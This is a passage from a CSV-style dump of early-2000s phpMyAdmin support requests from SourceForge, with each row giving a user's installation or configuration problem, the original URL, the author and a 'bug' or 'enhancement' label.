I ve checked the grab globals.lib.php file and can t see any parameter that I need to change there.
I ve checked line 8 and it says require .
libraries grab globals.lib.php ); Have you got any idea where I m going wrong.
I ve created databases before, and am told this program is a popular front end for creating MySql databases.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 38 https sourceforge.net p phpmyadmin support requests 38 Original author toprobroy","bug"
"24444","1856","Using phpMyAdmin functions elsewhere.
I am interested in making use of the phpMyAdmin fucntions from other PHP programs.
As an example I d like to construct a web based emailing program that would select email addresses from a database depending on certain criteria, display the addressees in an HTML table, allowing me to confirm whether to send emails to these addresses, then to log in the database the fact that the email was sent to each of them.
Clearly lots of useful database admin code and screen painting code exists in phpMyAdmin that could be used for this type of application.
Can I get access to these routines?
Is the process documented?
If not, I would be prepared to set up some sample applications, and document the process, if some phpMyAdmin developer could pioint me in the right direction.
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 39 https sourceforge.net p phpmyadmin support requests 39 Original author charlespalmer","enhancement"
"24444","1857","phpMyAdmin installation issue.
Hi I have installed phpMyAdmin in my web folder on my host skynet.ie I have my MySQL datbase with them too.
When i open up phpMyAdmin On the left bar i can see my database ninag and under it i can see the two tables i have in it at the moment.
In the right frame though i only have amp;quot;Welcome to phpMyAdmin 2.2.5 MySQL 3.23.32 running on orac.skynet.ie as ninag orac phpMyAdmin Language phpMyAdmin documentation Official phpMyAdmin Homepage Sourceforge phpMyAdmin Download Page [ChangeLog] [CVS] [Lists] amp;quot; Isnt there supposed to be a part where i can admin my database ?
When i click on my database all i get in the right frame is amp;quot;ERROR 404 REQUESTED DOCUMENT IS MISSING The document you requested does not exist or is unavailable at this time.
Please check the requested URL and try again.
Remember that Internet URLs are case sensitive.
If the problem persists, please report it to webadm csn.ul.ie Please include the missing URL.
Copyright xc5xa0 2001 UL Computer Society amp;quot; Idont know where ive gone wrong as im a complete beginner.
Any help would be greatly appreciated Regards nina Original URL https sourceforge.net p phpmyadmin support requests 40 https sourceforge.net p phpmyadmin support requests 40 Original author ninag","bug"
"24444","1858","Root.
I dont have root access to the server what do I need to do in order to be able to use this progam to control my mysql) OuterRealm email bossman0123 hotmail.com) MSN outerrealm2000 hotmail.com) Yahoo outerrealm2000 yahoo.com) AOL IM Zeropoint juliet) ICQ 40156452) Thanks Original URL https sourceforge.net p phpmyadmin support requests 41 https sourceforge.net p phpmyadmin support requests 41 Original author anonymous","bug"
"24444","1859","2.2.5) Can Select DB, but Main Page Update.
I can select the DB, but when is refreshes the page, it s not updating the right side of the screen.
The URL of the problem is http www.hamiltonats.com phpMyAdmin PHP configuration can be viewed at http www.hamiltonats.com test.php The PostNuke Installation works, and seems to access everything fine.
http www.hamiltonats.com index.php I ve recompiled MySQL and updated PHP.
Not sure what else I can do to make it work.
Thanks for any help you can provide!
Thanks!
Jeff Original URL https sourceforge.net p phpmyadmin support requests 42 https sourceforge.net p phpmyadmin support requests 42 Original author phases","bug"
"24444","1860","can t upload photos to mysql database.
I can t upload, via my php real estate program, photos to my mysql database.
Program developers said that server php is set to safe mode.
My webhost, for some reason, can t turn safe mode off.
I was told to change setting in php.ini to amp;quot;off amp;quot;.
Webhost says they can t figure out how.
What can you tell me?
I m very new to this green.
Original URL https sourceforge.net p phpmyadmin support requests 43 https sourceforge.net p phpmyadmin support requests 43 Original author anonymous","bug"
"24444","1861","Running a central copy on Cobalt RAQ3.
I want to have a central copy of phpMyAdmin in a directory home myPhpAdmin.
I have updated etc httpd conf srm.conf so that on the server, which has only 1 IP address any virtual site can reach phpMYAdmin from the url http mydomain.com phpMyAdmin.
Alias phpMyAdmin home phpMyAdmin amp;gt; amp;gt; etc httpd conf srm.conf Alias phpmyadmin home phpMyAdmin amp;gt; amp;gt; etc httpd conf srm.conf Alias MyAdmin home phpMyAdmin amp;gt; amp;gt; etc httpd conf srm.conf Alias myadmin home phpMyAdmin amp;gt; amp;gt; etc httpd conf srm.conf The problem I need to resolve is in the config.inc.php file, cfgPmaAbsoluteUri = ; The server has up to 200 different domains and I need this to be picked up automatically based on the url entered to call up phpMyAdmin Suggestions would be much appreciated.
Rgds Steve Bassi Original URL https sourceforge.net p phpmyadmin support requests 44 https sourceforge.net p phpmyadmin support requests 44 Original author stevebassi","bug"
"24444","1862","The directory name is invalid..
Lies?
LoL.
I know MySQL works...
I am running 3.?
and I tested it by installing the OBDC drivers and connecting to it through ASP.
MySQL works... what does this error mean?
The directory name is invalid.
I set my ..AbsoluteUri to http localhost phpmyadmin I m running 2.2.6, also tried 2.2.3, etc so it s not specific to any version) since it told me I had to.
That was all ok.
So, i go to http localhost phpmyadmin and i get that error.
The directory name is invalid.
\ Is it lying to me?
heh..
I must be missing some extra config setting somewhere?
Could anyone tell me what setting that might be what file it is located in?
I am running MySQL 3.?
on a Windows 2000 Advanced Server.
Thanks bunches Kyle Otto kyle nodehosting.com Original URL https sourceforge.net p phpmyadmin support requests 45 https sourceforge.net p phpmyadmin support requests 45 Original author anonymous","bug"
"24444","1863","2.2.3) phpmyadmin and macosx.
macosx 10.1.3 Apache HTTP Server Version 1.3 phpMyAdmin 2.2.3 PHP Version 4.1.2 mysql 3.23.49 In phpmyadmin homepage, when i select a DB name or Table name the browser crash and close.
I tried with amp;quot;Internet Explorer 5.1 amp;quot;, amp;quot;Netscape 6.2.1 amp;quot; and amp;quot;Icab Preview 2.7.1 amp;quot; Somebody can help me?
Thanks Giorgio Guarini Original URL https sourceforge.net p phpmyadmin support requests 46 https sourceforge.net p phpmyadmin support requests 46 Original author anonymous","bug"
"24444","1864","Unable to run PHPMyAdmin Local!?!?!.
Hi.
Since you have the variable amp;quot; cfgPmaAbsoluteUri amp;quot; in your config file I m unable tu run PHPMyAdmin on my local Notebook.
I m able to display the index page of PHPMyAdmin but when i choose a database or do something else i get the error amp;quot;404 Page not found amp;quot;.
All other PHP scripts are running without any problem.
On my Webserver PHPMyAdmin is also running without any problem.
I think the thing is, that the adress on my notebook looks like amp;quot;http my notebook name path to phpmyadmin amp;quot; and not amp;quot;http www.my server.com path to phpmyadmin amp;quot;.
Please Help!
My System WinXP Prof IIS 5.1 PHP 4.1.2 MySQL 3.23.49 NT Original URL https sourceforge.net p phpmyadmin support requests 47 https sourceforge.net p phpmyadmin support requests 47 Original author anonymous","bug"
"24444","1865","2.2.6) problema di installazione.
Ho installato phpmyadmin 2.2.6 e mi da questo errore amp;quot;La direttiva cfgPmaAbsoluteUri DEVE essere impostata nel file di configurazione!
amp;quot;.
Come si imposta ?
Grazie per l attenzione Original URL https sourceforge.net p phpmyadmin support requests 48 https sourceforge.net p phpmyadmin support requests 48 Original author anonymous","bug"
"24444","1866","Left Frame wont Display.
The left frame will not showup.
I get the right frame only Welcome to phpMyAdmin 2.2.6 MySQL 4.0.1 alpha running on localhost as root localhost) Thats the only part i see..
I have two databases, Mysql default) and one i created and am using for my site.
Any thoughts would be great.
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 49 https sourceforge.net p phpmyadmin support requests 49 Original author fizz","bug"
"24444","1867","Left Frame wont Display.
The left frame will not showup.
I get the right frame only Welcome to phpMyAdmin 2.2.6 MySQL 4.0.1 alpha running on localhost as root localhost) Thats the only part i see..
I have two databases, Mysql default) and one i created and am using for my site.
Any thoughts would be great.
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 50 https sourceforge.net p phpmyadmin support requests 50 Original author fizz","bug"
"24444","1868","refresh screen.
my ie keeps caching the small pages that it s serving so the left frame listing of databases never get updated properly.
add some phpheaders to force no caching to fix problem.
Original URL https sourceforge.net p phpmyadmin support requests 51 https sourceforge.net p phpmyadmin support requests 51 Original author anonymous","bug"
"24444","1869","Added relation feature in QBE.
Hi, I was the one a while ago that had asked for the feature of using the relation table to create queries that amp;quot;know amp;quot; what relations to use to complete your query in the Query by Example page.
I finally got around to testing it out and unfortunately, it didn t work for me.
Here s my situation so that you know what I did In my database, I have three tables entry engineer relation The third is the obvious relation table.
In the entry table, there is a column called amp;quot;id amp;quot;, which relates to the column amp;quot;id amp;quot; in the engineer table.
In my relation table, I have these values for each column src table amp;gt; amp;quot;entry amp;quot; src column amp;gt; amp;quot;id amp;quot; dest table amp;gt; amp;quot;engineer amp;quot; dest column amp;gt; amp;quot;id amp;quot; When I browse through the entry table, the links show up in the amp;quot;id amp;quot; column and work just fine.
Then I went to Query by Example QBE).
I choose the entry and engineer tables, and chose the entry.title column as well as the engineer.name column, which are related by the amp;quot;id amp;quot; column in each.
I submitted the query, and nothing was done to recognize the fact that the relation added in the relation table was needed to complete the query successfully.
The only way for me to get the query working properly is if I added the extra column myself to let the query know that the amp;quot;id amp;quot; column for each is the same.
Am I missing something here?
Am I not thinking the correct way about what this relation functionality is supposed to be doing?
Any help would be greatly appreciated.
Thanks again for a great product!
Original URL https sourceforge.net p phpmyadmin support requests 52 https sourceforge.net p phpmyadmin support requests 52 Original author grapeice925","bug"
"24444","1870","Right Frame Wont Display.
I m getting the opposite to the previous post.
I m connected as my username localhost I ve got the Welcome to PHP MY ADMIN 2.2.6, and a list of things in the left frame.
Beginning with phpbb access phpbb banlist etc At the very top left I get HOME and underneath amp;quot;My User Name amp;quot; 24).
MY problem is when I click on any of those, the right frame only shows the standard bumph which is detect network settings etc....as it won t display anything.
I ve configured the config.inc.php with my username and password as follows cfgServers[ i][ user ] = In here is my username ; MySQL user cfgServers[ i][ password ] = In Here is my password ; MySQL password only needed =========================================== Thats it...any ideas.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 53 https sourceforge.net p phpmyadmin support requests 53 Original author toprobroy","bug"
"24444","1871","2.2.5) Headers already sent issue?.
Hi, I m running Apache 1.3.24, MySQL 3.23.49a, PHP 4.1.2 with phpmyadmin 2.2.5.
When I click on the Users link I get the following error.
I ve checked all the files listed for spaces before amp;lt;?php and after ?
amp;gt; as mentioned in the FAQ s but nothing changes.
I also don t have a link to add new databases.
Please help Warning Supplied argument is not a valid MySQL result resource in home mysqladmin user details.php on line 989 Warning Cannot add header information headers already sent by output started at home mysqladmin user details.php 989) in home mysqladmin libraries ob.lib.php on line 53 Warning Cannot add header information headers already sent by output started at home mysqladmin user details.php 989) in home mysqladmin header.inc.php on line 23 Warning Cannot add header information headers already sent by output started at home mysqladmin user details.php 989) in home mysqladmin header.inc.php on line 24 Warning Cannot add header information headers already sent by output started at home mysqladmin user details.php 989) in home mysqladmin header.inc.php on line 25 Warning Cannot add header information headers already sent by output started at home mysqladmin user details.php 989) in home mysqladmin header.inc.php on line 26 Warning Cannot add header information headers already sent by output started at home mysqladmin user details.php 989) in home mysqladmin header.inc.php on line 27 Warning Cannot add header information headers already sent by output started at home mysqladmin user details.php 989) in home mysqladmin header.inc.php on line 29 Any host Any user Error MySQL said No user s) found.
Original URL https sourceforge.net p phpmyadmin support requests 54 https sourceforge.net p phpmyadmin support requests 54 Original author anonymous","bug"
"24444","1872","Variables aren t POSTed.
On my local test machine phpMyAdmin works fine, but when I installed copied all files and edited config.php) it on my active site ISP based) I encountered some strange behavior On some forms for instance when INSERTing a new record) variables were not POSTed upon submit, and mySQL query could not be run.
When I changed the form method from amp;quot;post amp;quot;to amp;quot;GET amp;quot; amp;lt;form method= amp;quot;GET amp;quot; action= amp;quot;tbl replace.php amp;quot; name= amp;quot;insertForm amp;quot; amp;gt; Variables were submitted, query was ok, and operation completed succesfully.
The following is the reply I get when form method is POST ====================================================== Warning Variable passed to reset ) is not an array or object in usr local psa home vhosts seakayak.co.il httpdocs n py tbl replace.php on line 51 Warning Variable passed to each ) is not an array or object in usr local psa home vhosts seakayak.co.il httpdocs n py tbl replace.php on line 161 Warning Cannot add header information headers already sent by output started at usr local psa home vhosts seakayak.co.il httpdocs n py tbl replace.php 51) in usr local psa home vhosts seakayak.co.il httpdocs n py libraries ob.lib.php on line 53 Warning Cannot add header information headers already sent by output started at usr local psa home vhosts seakayak.co.il httpdocs n py tbl replace.php 51) in usr local psa home vhosts seakayak.co.il httpdocs n py header.inc.php on line 23 Warning Cannot add header information headers already sent by output started at usr local psa home vhosts seakayak.co.il httpdocs n py tbl replace.php 51) in usr local psa home vhosts seakayak.co.il httpdocs n py header.inc.php on line 24 Warning Cannot add header information headers already sent by output started at usr local psa home vhosts seakayak.co.il httpdocs n py tbl replace.php 51) in usr local psa home vhosts seakayak.co.il httpdocs n py header.inc.php on line 25 Warning Cannot add header information headers already sent by output started at usr local psa home vhosts seakayak.co.il httpdocs n py tbl replace.php 51) in usr local psa home vhosts seakayak.co.il httpdocs n py header.inc.php on line 26 Warning Cannot add header information headers already sent by output started at usr local psa home vhosts seakayak.co.il httpdocs n py tbl replace.php 51) in usr local psa home vhosts seakayak.co.il httpdocs n py header.inc.php on line 27 Warning Cannot add header information headers already sent by output started at usr local psa home vhosts seakayak.co.il httpdocs n py tbl replace.php 51) in usr local psa home vhosts seakayak.co.il httpdocs n py header.inc.php on line 29 Error SQL query INSERT INTO ) VALUES ); MySQL said You have an error in your SQL syntax near ) VALUES ) at line 1 ===================================================== System Linux Server Apache 1.3.22 DB mySQL 3.23.46 let me know if you need other details as well.
Yaron Original URL https sourceforge.net p phpmyadmin support requests 55 https sourceforge.net p phpmyadmin support requests 55 Original author anonymous","bug"
"24444","1873","phpMyAdmin for Virtual Host.
My question is this I am setting up a Cobalt RAQ4r and have installed phpMyAdmin.
I want each user that has a web site on the server to be able to use phpMyAdmin, but be able to get into others Databases.
Can some one please help out with this or atleast point me in the right direction.
Thanks In Advance, DevHead Original URL https sourceforge.net p phpmyadmin support requests 56 https sourceforge.net p phpmyadmin support requests 56 Original author devhead","enhancement"
"24444","1874","cannot load MySQL extension,.
Hi There, I have got a dedicated server.
Which I so far have install Linux Red Hat 7.2, php, perl and cgi.
I have not configured php as I dont know what to put the setting, in Webmin.
There is a bit for php in apache...
When I try and load phpmyadmin I get the following error... http 195.224.41.72 sql index.php Original URL https sourceforge.net p phpmyadmin support requests 57 https sourceforge.net p phpmyadmin support requests 57 Original author anonymous","bug"
"24444","1875","Cannot load MySQL extension.
I have installed phpMyAdmin version 2.2.6 and configured it according to the instructions, but when I try to connect through a browser, I get the following error cannot load MySQL extension, please check PHP Configuration.
Can someone please help?
For your information, I have phpPgAdmin installed for Postgresql) and it works just fine.
Please help.
Thanks Joe Rogoiyo Original URL https sourceforge.net p phpmyadmin support requests 58 https sourceforge.net p phpmyadmin support requests 58 Original author anonymous","bug"
"24444","1876","Virtual hosts in configuration.
I use Apache with virtual host names for each website.
Each website has an alias to the phpmyadmin folder where it is installed.
But in the config of phpmyadmin i have to specify the cfgPmaAbsoluteUri variable.
But because i use virtual host names, that name differs for each website.
This results in unwanted site behavior.
example hosts virtual1.server.net virtual2.server.net both have Alias phpmyadmin pointed to www myphpadmin.
if i open http virtual1.server.net phpmyadmin or http virtual2.server.net phpmyadmin i get the login box and successfully see the database that belongs to that website.
But than comes the real problem.
When you click on a table in the left menu you get the login box again?!?!
I think that is because i can only set ONE cfgPmaAbsoluteUri variable.
How do i solve this behavior?
i donxc2xb4t want to login twice for each seperate website.
Thanks Arjen Original URL https sourceforge.net p phpmyadmin support requests 59 https sourceforge.net p phpmyadmin support requests 59 Original author arjenvanefferen","bug"
"24444","1877","tar.
In phpmyadmin we used for compression following system commands bzcompress gzencode gzcompress Should we use for this purpose instead of these many commands only amp;quot;tar amp;quot;?
Original URL https sourceforge.net p phpmyadmin support requests 60 https sourceforge.net p phpmyadmin support requests 60 Original author baatarmn","bug"
"24444","1878","conversion to php from php3.
All CVS versions of phpMyAdmin are in the .php3 format.
When we use CVS to download the files is there a means to convert them to .php extension on the fly along with making the necessary changes within the files?
Original URL https sourceforge.net p phpmyadmin support requests 61 https sourceforge.net p phpmyadmin support requests 61 Original author anonymous","bug"
"24444","1879","Password root.
I had phpMyAdmin running.
I tried to change password for the root user, and got this nasty error messages What i wrong!
Velkommen til phpMyAdmin 2.2.6 Warning Undefined variable cfgOBGzip in .
header.inc.php on line 10 Warning Cannot add header information headers already sent by output started at .
libraries auth config.auth.lib.php 91) in .
header.inc.php on line 23 Warning Cannot add header information headers already sent by output started at .
libraries auth config.auth.lib.php 91) in .
header.inc.php on line 24 Warning Cannot add header information headers already sent by output started at .
libraries auth config.auth.lib.php 91) in .
header.inc.php on line 25 Warning Cannot add header information headers already sent by output started at .
libraries auth config.auth.lib.php 91) in .
header.inc.php on line 26 Warning Cannot add header information headers already sent by output started at .
libraries auth config.auth.lib.php 91) in .
header.inc.php on line 27 Warning Undefined variable charset in .
header.inc.php on line 29 Warning Cannot add header information headers already sent by output started at .
libraries auth config.auth.lib.php 91) in .
header.inc.php on line 29 Warning Undefined variable text dir in .
header.inc.php on line 38 Feil MySQL sa MySQL Connection Failed Can t connect to MySQL server on 127.0.0.1 10061) Original URL https sourceforge.net p phpmyadmin support requests 62 https sourceforge.net p phpmyadmin support requests 62 Original author anonymous","bug"
"24444","1880","?)
warning Failed opening.
Fresh install on site.
Front page and all SEEM to work fine.
Go To Admin and I get the following errors.
Warning Failed opening .
admin referer.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 56 Warning Failed opening .
admin topics admin.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 60 Warning Failed opening .
admin news.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 64 Warning Failed opening .
admin user admin.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 68 Warning Failed opening .
admin menu edit.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 73 Warning Failed opening .
admin banners admin.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 77 Warning Failed opening .
admin help admin.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 81 Warning Failed opening .
admin config admin.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 85 Warning Failed opening .
admin update admin.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 89 Warning Failed opening .
admin lookfeel.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 93 Warning Failed opening .
admin htmlsetup.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 97 Warning Failed opening .
admin module installer.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 101 Warning Failed opening .
admin censorship admin.php for inclusion include path= .
usr local lib php ) in usr home peregrinesoft public html admin.php on line 105 \\\\\\\\\\\\\\\AND MORE \\\\\\\\\\\\\\\\\ Help Original URL https sourceforge.net p phpmyadmin support requests 63 https sourceforge.net p phpmyadmin support requests 63 Original author peregrinesoft","bug"
"24444","1881","Combo Menu Failiure.
I am running phpMyAdmin on my home machine Windows XP BadBlue webserver, on port 80.
PHP Installed.
MySQL installed.
Sucessfully running MySQL scripts through PHP.
Internet explorer 6.0, standard with Windows XP.
Installed phpMyAdmin done this before).
phpMyAdmin picks up all three of my databases.
I select the database from the combo box on the left hand side.
I click.
It loads up with the option selected, and a blank page.
Click Home takes me back to the start.
Clicking on Database statistics from the main page takes me to a list of databases.
Clicking on them loads up the usual database page.. Why isn t the combo box working?
I checked the name of the combo variable lightm db and stuck this into my webbrowser http localhost phpMyAdmin index.php?
lightm db=siteData This works.
I m confused.
Why doesn t the combo box work?
Original URL https sourceforge.net p phpmyadmin support requests 64 https sourceforge.net p phpmyadmin support requests 64 Original author anonymous","bug"
"24444","1882","Support for PHP 4.2.x.
phpPgAdmin 2.4.x doesn t work with PHP 4.2.x I suspect most of the pg exec will need to be changed to pg query and the pg numrows to pg num rows, etc... Also I think you will need to use the extract POST); on any form subit pages.
PHP 4.2.x appears to have more functionality and support for Postgresql.
This is a great app!!
You guys are doing an awesome job!
Asteroid7 I attached a file with some examples for php 4.2.x support.
Original URL https sourceforge.net p phpmyadmin support requests 65 https sourceforge.net p phpmyadmin support requests 65 Original author asteroid7","bug"
"24444","1883","MySQL said Acces denied for user.
i m my own provider, I have MAC OS X.1.5 with 4D webstar 5.1.2 apache amp;lt;2), CGI BIN php 4.1.2, MySQL 3.23.49. i have installed phpMyAdmin 2.2.6 on my web http sharing I m the admin of SQL i have installed on my server phpBB and it running wonderfull but there have an error with phpmyadmin when i want to connect amp;gt;Error amp;gt; amp;gt;MySQL said amp;gt; amp;gt; amp;gt;Access denied for user root xxx.xxx.xxx.xxx Using password amp;gt;YES) i have read on mysql doc that the password is encrypted, should i encrypt the password in config.inc.php file?
Original URL https sourceforge.net p phpmyadmin support requests 66 https sourceforge.net p phpmyadmin support requests 66 Original author anonymous","bug"
"24444","1884","Install too small?.
I have downloaded PHPAdmin multiple times and everytime either the installer is too small or I unzip files which my PC does not know how to open.
How do I download and install PHPAdmin onto my PC so that I may use it with MySQL which also doesn t seem to want to work either?
Go figure ) Original URL https sourceforge.net p phpmyadmin support requests 67 https sourceforge.net p phpmyadmin support requests 67 Original author shawnmaurice","bug"
"24444","1885","No login, no databases shown.
no databases in the left frame phpmyadmin connects to mysql but it s not showing any databases in the left frame.
I m sure there are because other web application sees them.
Even when I create a new db from phpmyadmin it doesn t display it.
The problem occurs when accessing the page on the first instance.
It does not ask for login details and amp;quot;No Databases amp;quot; appears in the left frame.
If we amp;quot;log out amp;quot; then log in again, the databases are then displayed.
All virtual sites are affected, not the root access.
We are running mysql 3.23.43 and phpMyAdmin 2.2.4 with multiple users.
Cobalt Raq4).
This occurred after a recent upgrade to our Chilisoft ASP software Ideas, anyone?
Original URL https sourceforge.net p phpmyadmin support requests 68 https sourceforge.net p phpmyadmin support requests 68 Original author wilsonpaul","bug"
"24444","1886","T CONSTANT ENCAPSED STRING.
I m trying to use phpMyAdmin 2.2.6 with a Xitami v2.5b4 server and when I load phpMyAdmin 2.2.6 index.php I get the following messages Parse error parse error, unexpected T CONSTANT ENCAPSED STRING in C \perl php\phpMyAdmin 2.2.6\config.inc.php on line 46 Notice Undefined variable cfgOBGzip in C \perl php\phpMyAdmin 2.2.6\header.inc.php on line 10 Warning Cannot add header information headers already sent by output started at C \perl php\phpMyAdmin 2.2.6\config.inc.php 46) in C \perl php\phpMyAdmin 2.2.6\header.inc.php on line 23 Warning Cannot add header information headers already sent by output started at C \perl php\phpMyAdmin 2.2.6\config.inc.php 46) in C \perl php\phpMyAdmin 2.2.6\header.inc.php on line 24 Warning Cannot add header information headers already sent by output started at C \perl php\phpMyAdmin 2.2.6\config.inc.php 46) in C \perl php\phpMyAdmin 2.2.6\header.inc.php on line 25 Warning Cannot add header information headers already sent by output started at C \perl php\phpMyAdmin 2.2.6\config.inc.php 46) in C \perl php\phpMyAdmin 2.2.6\header.inc.php on line 26 Warning Cannot add header information headers already sent by output started at C \perl php\phpMyAdmin 2.2.6\config.inc.php 46) in C \perl php\phpMyAdmin 2.2.6\header.inc.php on line 27 Notice Undefined variable charset in C \perl php\phpMyAdmin 2.2.6\header.inc.php on line 29 Warning Cannot add header information headers already sent by output started at C \perl php\phpMyAdmin 2.2.6\config.inc.php 46) in C \perl php\phpMyAdmin 2.2.6\header.inc.php on line 29 Notice Undefined variable text dir in C \perl php\phpMyAdmin 2.2.6\header.inc.php on line 38 Notice Undefined variable strPmaUriError in C \perl php\phpMyAdmin 2.2.6 \libraries\common.lib.php on line 384 What have I done wrong?
Here is C \perl php\phpMyAdmin 2.2.6\config.inc.php line 46 cfgServers[ i][ host ] = localhost ; MySQL hostname Hope someone can help me, thanx, Paul T Original URL https sourceforge.net p phpmyadmin support requests 69 https sourceforge.net p phpmyadmin support requests 69 Original author anonymous","bug"
"24444","1887","Access denied .... Error MySQL said Access denied for user xxxxxx localhost Using password YES) Original URL https sourceforge.net p phpmyadmin support requests 70 https sourceforge.net p phpmyadmin support requests 70 Original author anonymous","bug"
"24444","1888","Insert text file.
Hi, I am french so excuse me if my english is bad.
I am using PHP Version 3.0.14 or PHP Version 4.0.0 MySQL 3.22.30 shareware debug When I am using PHP3.0.14 PhpMyAdmin permit me to insert text file using the link Insert data from a textfile into table But when I use PHP4.0.0 This link doenxc2xb4t appear.
I mean that the option to insert a text file into the Table is not present, so of course i canxc2xb4t insert it.
Do you get a reason for this ?
If not, no probleme, I just wanted to Submit the bug.
If you need more information to get the bug submit relevant, donxc2xb4t doubt about writing me.
alarquet teleline.es Bye Arnaud Original URL https sourceforge.net p phpmyadmin support requests 71 https sourceforge.net p phpmyadmin support requests 71 Original author anonymous","bug"
"24444","1889","Error Uninitialized string offset.
I m getting the following errors when using phpMyAdmin Notice Uninitialized string offset 0 in home y share htdocs phpMyAdmin db details structure.php on line 450 Notice Uninitialized string offset 0 in home y share htdocs phpMyAdmin libraries di splay tbl.lib.php on line 1396 I m using the following PHP Version 4.2.1 FreeBSD 4.3 Apache 1.3.19 MSIE 6.0; Windows NT 4.0; Q312461 Has anyone encounterd these errors.
Original URL https sourceforge.net p phpmyadmin support requests 72 https sourceforge.net p phpmyadmin support requests 72 Original author anonymous","bug"
"24444","1890","http localhost phpmyadmin226 index.php.
Hi, when I choose a table or a database the url allways changes to http localhost phpmyadmin226 index.php.
What am I doinig wrong?
Yours Michel Original URL https sourceforge.net p phpmyadmin support requests 73 https sourceforge.net p phpmyadmin support requests 73 Original author michelettinger","bug"
"24444","1891","install config problem please help!.
I just installed phpMyAdmin 2.3.0 rc1 and am having difficulties getting it to work.
Previously I had an earlier version working, but lost that directory before I attempted to install this new version.
I m installing it for local dev use) on Win2k pro running Apache, MySQL amp;amp; php4.
I installed them originally using phpTriad and have had no problem with them.
What s happening is this...
I entered the correct absolute path cfg[ PmaAbsoluteUri ] = http localhost phpMyAdmin 2.3.0 rc1 ; [ auth type ] = config [ user ] = mylogin [ password ] = mypass When I load the index page I get an empty frameset.
If I enter an incorrect log pass, it gives me an error saying login is incorrect.
Apache php mysql are all working otherwise i ve checked.
And as I said, I did at one time have a working verion of phpmyAdmin running.
I also have a copy of phpmyAdmin running on a remote host without difficulties.
I would appreciate any help or advice I could be given in this area.
thank you very much.
Chet Original URL https sourceforge.net p phpmyadmin support requests 74 https sourceforge.net p phpmyadmin support requests 74 Original author anonymous","bug"
"24444","1892","Could phpmyadmin be used on powweb.com?.
Could phpmyadmin be used on powweb.com?
Original URL https sourceforge.net p phpmyadmin support requests 75 https sourceforge.net p phpmyadmin support requests 75 Original author urbanpromoter","bug"
"24444","1893","MySQL extension missing???.
I have an Intanet based on Linux Apache PHP MySQL and it works perfectly.
I ve installed PhpMyAdmin 2.3.0 rc.1, I changed the few parameters required, but when accessing the main page I get this messages amp;quot;cannot load MySQL extension, please check PHP Configuration amp;quot; It matches the message code strCantLoadMySQL, but I don t understand why.
Anybody can help?
master contur.it Original URL https sourceforge.net p phpmyadmin support requests 76 https sourceforge.net p phpmyadmin support requests 76 Original author anonymous","bug"
"24444","1894","Run a query problem.
I want to know if there is any kind or tip to run a query from a web url or ftp url.
The problems is because my DB is 16MB sized and I can t upload it from my pc.
It shows amp;quot;The page can not display amp;quot; text.
Thank you.
Roberto O. Fernxc3xa1ndez Crisial.
Original URL https sourceforge.net p phpmyadmin support requests 77 https sourceforge.net p phpmyadmin support requests 77 Original author anonymous","bug"
"24444","1895","Array for Multiple databases.
I m a bit comfused on something that is probably very stupid.
I would like to have the admin show only 3 databases that I use, instead of all of the ones that are on the server.
How do I make an array to show the 3 databases only???
Thanks Original URL https sourceforge.net p phpmyadmin support requests 78 https sourceforge.net p phpmyadmin support requests 78 Original author anonymous","bug"
"24444","1896","Index.php.
I was able to get things set up to a point but could use some help now.
I get the initial index.php to display with a pull down list of database in the left frame.
I select a database the page refreshes but it just goes back to the same screen displaying the index.php and amp;quot;Please select a database amp;quot;.
what am I doing wrong TIA Michael Original URL https sourceforge.net p phpmyadmin support requests 79 https sourceforge.net p phpmyadmin support requests 79 Original author anonymous","bug"
"24444","1897","2.2.6) PHP version unrecognized..
I ve installed phpMyadmin 2.2.6 and on my server runs php 4.1.2 but phpMyAdmin reports as php version 3.0.9, and many phpMyAdmin functions are not available.
I haven t complete access to this server, but only to my http root, so I don t know what is really installed, but phpinfo ) reports correctly php version 4.1.2.
Note that phpMyAdmin 2.2.1 works well and reports the correct version of php.
Original URL https sourceforge.net p phpmyadmin support requests 80 https sourceforge.net p phpmyadmin support requests 80 Original author massimoxxx","bug"
"24444","1898","No tables found in database.
BLOB Q?.
It s telling me that there are no tables found in the database, when in fact there are tables!
There are no records rows...I don t know if that has anything to do with it.
I d also like to know why BLOB columns are not able to be seen.
Is there a config setting to change this??
In the previous versions, I was able to view BLOB text...but not anymore.
Original URL https sourceforge.net p phpmyadmin support requests 81 https sourceforge.net p phpmyadmin support requests 81 Original author pain4joo","bug"
"24444","1899","Feature quot;Propose Table Structure quot;.
I have been using phpMyAdmin for 4 years now... makes life much easier ) I recently updated my phpMyAdmin from a VERY old version and really like the new features.
However this one puzzles me Propose Table Structure....
I read the documentation, and really would like to run this on some of my older databases.
However, whenever I click on the link it returns no results.
Is there any setup in phpMyAdmin or in mySQL itself that needs to be completed before I can use this feature?
phpMyAdmin 2.3.0 rc1 MySQL 3.23.44 Original URL https sourceforge.net p phpmyadmin support requests 82 https sourceforge.net p phpmyadmin support requests 82 Original author oaxlin","bug"
"24444","1900","Variable passed to reset ) is not an array.
I am using phpMYAdmin 2.3.0 rc2 I downloaded the zip file version on my machine then ftped it up to my isp.
My isp is using a linux box with My SQL and PHP installed.
I set the proper congiuration in config.inc.php based on information my isp gave me.
They appear to have a lot of experince in configuration.
But When I go to the directory I gest this error Warning Variable passed to reset ) is not an array or object in home httpd nawright northmetromuskies.com html ph pmyadminnw libraries common.lib.php on line 405 Warning Variable passed to each ) is not an array or object in home httpd nawright northmetromuskies.com html ph pmyadminnw libraries common.lib.php on line 406 Does anyone know why this is happening?
Your help is kindly appreciated.
